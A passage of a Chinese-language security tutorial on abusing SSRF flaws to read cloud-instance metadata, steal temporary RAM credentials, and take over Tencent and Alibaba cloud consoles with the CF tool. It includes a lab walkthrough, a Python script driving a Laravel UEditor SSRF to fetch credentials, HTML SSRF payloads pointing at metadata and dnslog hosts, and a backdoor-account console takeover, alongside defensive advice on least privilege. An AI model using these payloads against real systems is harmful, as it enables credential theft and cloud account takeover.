注意由于是暴露在公網(wǎng)的靶場(chǎng)，所以務(wù)必要要小心謹(jǐn)慎，即使清除靶場(chǎng)環(huán)境……上述 AdministratorAccess 的角色策略決定了其相應(yīng)實(shí)體的會(huì)話憑據(jù)泄露足以導(dǎo)致整個(gè)騰訊云控制臺(tái)被接管，也就是你名下所有騰訊云服務(wù)器資源都可以被控制。

實(shí)際上我們完全給騰訊云 CVM 實(shí)例授予角色后在實(shí)例內(nèi)部訪問(wèn)元數(shù)據(jù)地址來(lái)獲得臨時(shí)憑據(jù)，并進(jìn)行下一步的漏洞利用。為了避免公網(wǎng)靶場(chǎng)導(dǎo)致自己的騰訊云控制臺(tái)被接管，先回到 TerraformGoat 容器內(nèi)銷(xiāo)毀騰訊云 SSRF 靶場(chǎng)實(shí)例：

terraform destroy

將自動(dòng)銷(xiāo)毀創(chuàng)建的騰訊云 CVM 服務(wù)器實(shí)例并退還凍結(jié)資金：

然后重新手動(dòng)創(chuàng)建并 購(gòu)買(mǎi)一個(gè)按量計(jì)費(fèi)的騰訊云 CVM 服務(wù)器實(shí)例 即可：


至于給新的實(shí)例進(jìn)行角色授權(quán)配置的過(guò)程則不再贅述，通過(guò)新實(shí)例訪問(wèn)元數(shù)據(jù)中的臨時(shí)憑據(jù)：

2.4 接管騰訊云控制臺(tái)

接下來(lái)看看如何通過(guò)騰訊云 SSRF 漏洞竊取到實(shí)例的臨時(shí)會(huì)話憑證后，完成騰訊云控制臺(tái)的接管。漏洞利用過(guò)程可以直接使用 CF 框架進(jìn)行利用，也可以使用騰訊云官方提供的客戶端管理工具 TCCLI：《命令行工具 產(chǎn)品簡(jiǎn)介-文檔中心-騰訊云》。TCCLI 是管理騰訊云資源的統(tǒng)一工具，通過(guò)騰訊云命令行工具，您可以快速輕松的調(diào)用騰訊云 API 來(lái)管理您的騰訊云資源，進(jìn)行無(wú)圖形頁(yè)面操作騰訊云資源。

TCCLI 的具體用法請(qǐng)參見(jiàn)官方指導(dǎo)文檔（似乎不支持直接配置 CVM 實(shí)例所在角色對(duì)應(yīng)的臨時(shí)憑證），下文將借助 CF 框架一鍵完成騰訊云控制臺(tái)的接管。

[root@hwc-hwp-587401-751218 CF]# ./cf tencent
執(zhí)行與騰訊云相關(guān)的操作
Usage:cf tencent [command]Available Commands:console      一鍵接管控制臺(tái) (Takeover console)cvm          執(zhí)行與彈性計(jì)算服務(wù)相關(guān)的操作 (Perform cvm-related operations)lh           執(zhí)行與輕量計(jì)算服務(wù)相關(guān)的操作 (Perform lh-related operations)perm         列出當(dāng)前憑證下所擁有的權(quán)限 (List access key permissions)regions      列出可用區(qū)域 (List available regions)uninstall    一鍵卸載云鏡 (Uninstall Agent)Flags:-h, --help   help for tencentGlobal Flags:--logLevel string   設(shè)置日志等級(jí) [trace|debug|info|warn|error|fatal|panic] (default "info")
Use "cf tencent [command] --help" for more information about a command.
[root@hwc-hwp-587401-751218 CF]#

先進(jìn)行認(rèn)證憑據(jù)的配置：

一鍵接管控制臺(tái)：

登錄騰訊云控制臺(tái)接管賬戶：


最后，借助 CF 刪除創(chuàng)建的后門(mén)賬戶，并清除 CVM 角色，避免被入侵，沒(méi)有使用需求的情況下銷(xiāo)毀服務(wù)器實(shí)例，避免耗費(fèi)資金。


值得一提的是，上述 CF 利用全程騰訊云安全防護(hù)中心（免費(fèi)版）均為發(fā)生告警信息（這個(gè)比起阿里云云盾的風(fēng)險(xiǎn)識(shí)別能力還是相差較大的）：

SSRF組合拳案例

下文將記錄的是從網(wǎng)上優(yōu)秀博文提取的借助 SSRF 漏洞獲取云服務(wù)器 Metadata 敏感元數(shù)據(jù)并接管目標(biāo)服務(wù)器的實(shí)例，以提供一些實(shí)戰(zhàn)過(guò)程中漏洞挖掘思路。

3.1 上傳圖片功能SSRF

源于 Teamssix 大佬的《我用 CF 打穿了他的云上內(nèi)網(wǎng)》。
通過(guò)指紋掃描發(fā)現(xiàn)在目標(biāo)范圍內(nèi)的一個(gè)站點(diǎn)使用了 Laravel 框架，接著測(cè)試發(fā)現(xiàn)該站點(diǎn)存在 Laravel UEditor SSRF 漏洞。這里的 SSRF 漏洞觸發(fā)點(diǎn)在 UEditor 編輯器的上傳圖片功能中，下面我們嘗試讓服務(wù)器從 https://baidu.com?.jpg 獲取圖片：

然后我們讀取返回的文件地址，通過(guò)返回的內(nèi)容可以看到服務(wù)端確實(shí)訪問(wèn)到了 https://baidu.com?.jpg，說(shuō)明這里確實(shí)存在 SSRF 漏洞。

通過(guò)查詢?cè)撚蛎鶎?IP，發(fā)現(xiàn)該站點(diǎn)位于云上，那么我們就可以利用這個(gè) SSRF 漏洞去獲取實(shí)例的元數(shù)據(jù)信息，但是這樣每次獲取數(shù)據(jù)都要手動(dòng)發(fā)兩個(gè)數(shù)據(jù)包就很麻煩，所以這里簡(jiǎn)單搞個(gè)腳本。

import sys
import requestsssrf_url = sys.argv[1]
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.3100.0 Safari/537.36"}req1 = requests.get("https://your_target.com/laravel-u-editor-server/server?action=catchimage&source[]=" + ssrf_url,headers=headers)
req2 = requests.get(req1.json()["list"][0]["url"],headers=headers)print(req2.text)

通過(guò)查詢?cè)撜军c(diǎn)的 IP 得知該站點(diǎn)位于阿里云上，阿里云的元數(shù)據(jù)地址為 http://100.100.100.200/latest/meta-data，我們嘗試獲取一下。

可以看到成功獲取到了元數(shù)據(jù)信息，并且值得注意的是，在元數(shù)據(jù)信息里還有 ram/目錄，這就意味著這臺(tái)實(shí)例存在臨時(shí)訪問(wèn)憑證，也就是說(shuō)存在被進(jìn)一步利用的可能性。我們一步步打開(kāi) ram/ 目錄，在 http://100.100.100.200/latest/meta-data/ram/security-credentials/laravel-test-role 下找到了臨時(shí)訪問(wèn)憑證。

接下來(lái)就是借助 CF 工具開(kāi)展云上的橫向滲透利用了，具體請(qǐng)參見(jiàn)原文。

3.2 文件導(dǎo)出功能SSRF

本小節(jié)源于：《奇安信攻防社區(qū)-文件導(dǎo)出功能的SSRF》。
有些網(wǎng)站存在功能，能夠?qū)⒁恍?shù)據(jù)分析的表格導(dǎo)出為 pdf 或者圖片，如下 POST 數(shù)據(jù)包，html 文件就是我們要導(dǎo)出的內(nèi)容，而這里存在 ssrf 漏洞：

我們將 html 內(nèi)容修改為：

<svg><iframe src="http://123312.h41t0y.dnslog.cn" width=" " height=" "/></svg>

可以看到成功觸發(fā)了 dnslog 請(qǐng)求，說(shuō)明此處是存在 SSRF 漏洞的。

當(dāng)一些特殊標(biāo)簽比如<svg>,<Iframe>等被禁用后，我們可以使用 <meta>0 秒刷新請(qǐng)求元數(shù)據(jù)，以下為具體 payload：

<meta http-equiv="refresh" content="0;url=http://metadata.tencentyun.com/latest/meta-data" />

那么目標(biāo)服務(wù)器的metadata信息就會(huì)打印在輸出的 PDF 文件上：


其他可供參考學(xué)習(xí)的思路與案例：

1. 《印象筆記 價(jià)值 5000$的SSRF 案例分析 | CTF導(dǎo)航》;
2. 《翻譯文章 | 將SSRF升級(jí)為通過(guò) aws 元數(shù)據(jù)訪問(wèn)所有用戶 PII 信息》；

總結(jié)

本文講述了云服務(wù)廠商的云服務(wù)器實(shí)例提供的元數(shù)據(jù)服務(wù)所面臨的安全威脅，如果云服務(wù)器存在 SSRF 漏洞導(dǎo)致元數(shù)據(jù)中實(shí)例具備的角色所對(duì)應(yīng)的臨時(shí)憑據(jù)謝泄露，那么攻擊者可以通過(guò)云服務(wù)廠商提供的客戶端管理工具或者 CF 云環(huán)境利用工具，非法調(diào)用受害者的云服務(wù)實(shí)例 API，甚至創(chuàng)建后門(mén)賬戶接管云服務(wù)管理臺(tái)，接管受害者的所有云服務(wù)資源。作為云服務(wù)器的運(yùn)維人員，應(yīng)當(dāng)在規(guī)避對(duì)外業(yè)務(wù) SSRF 漏洞的同時(shí)，避免對(duì)服務(wù)器實(shí)例授予過(guò)高權(quán)限的角色。

下面引用 Teamssix 大佬的《從云服務(wù)器 SSRF 漏洞到接管你的阿里云控制臺(tái)》的精辟總結(jié)（Respect）：

上述方法在實(shí)戰(zhàn)中想要使用是有一些前提的，主要前提有以下兩個(gè)：

1. ECS 實(shí)例（騰訊云是 CVM） 需要被授予 RAM 角色，不然訪問(wèn)臨時(shí)憑證的元數(shù)據(jù)會(huì)返回 404；
2. RAM 角色需要具備 ram 訪問(wèn)控制的相關(guān)操作權(quán)限，例如創(chuàng)建用戶、賦予權(quán)限等，不然臨時(shí)秘鑰會(huì)沒(méi)有創(chuàng)建子用戶的權(quán)限；

在實(shí)戰(zhàn)中，如果遇到了 ECS 實(shí)例被授予了 RAM 角色的情況，大多時(shí)候該角色都是不具備創(chuàng)建用戶權(quán)限的，這時(shí)就沒(méi)法通過(guò)創(chuàng)建子賬號(hào)登錄控制臺(tái)的方式了，只能通過(guò)阿里云命令行工具去操作目標(biāo)云服務(wù)了。

總的來(lái)說(shuō)，云上攻防和常規(guī)的內(nèi)網(wǎng)攻防還是十分不一樣的。

1. 云上攻防的常見(jiàn)問(wèn)題是配置錯(cuò)誤，例如這里的問(wèn)題就是 RAM 角色配置權(quán)限過(guò)高。
2. 云上攻防的權(quán)限維持主要方法是創(chuàng)建 RAM 高權(quán)限用戶，而不是像傳統(tǒng)攻防里那樣有五花八門(mén)的權(quán)限維持方法。
3. 云上攻防的內(nèi)網(wǎng)橫向主要是在云服務(wù)廠商命令行或者控制臺(tái)中進(jìn)行橫向，從這個(gè)云服務(wù)橫向到另一個(gè)云服務(wù)，而不是像傳統(tǒng)攻防那樣有各種各樣的內(nèi)網(wǎng)橫向手法。

最后，更多的云服務(wù)安全攻防資料可參見(jiàn)：《攻防矩陣 | 云安全知識(shí)庫(kù)》、《Awesome Cloud Security 云安全資源匯總》。

本文相關(guān)的參考文章：

1. 阿里云 ECS 彈性計(jì)算服務(wù)攻防 | 云安全知識(shí)庫(kù)；
2. 淺談阿里云ECS滲透之元數(shù)據(jù)；
3. Cloud RedTeam視角下元數(shù)據(jù)服務(wù)攻防實(shí)踐；
4. 淺談云上攻防之：元數(shù)據(jù)服務(wù)帶來(lái)的安全挑戰(zhàn)-安全客；
5. 我用 CF 打穿了他的云上內(nèi)網(wǎng)_cf內(nèi)網(wǎng)穿透-CSDN博客；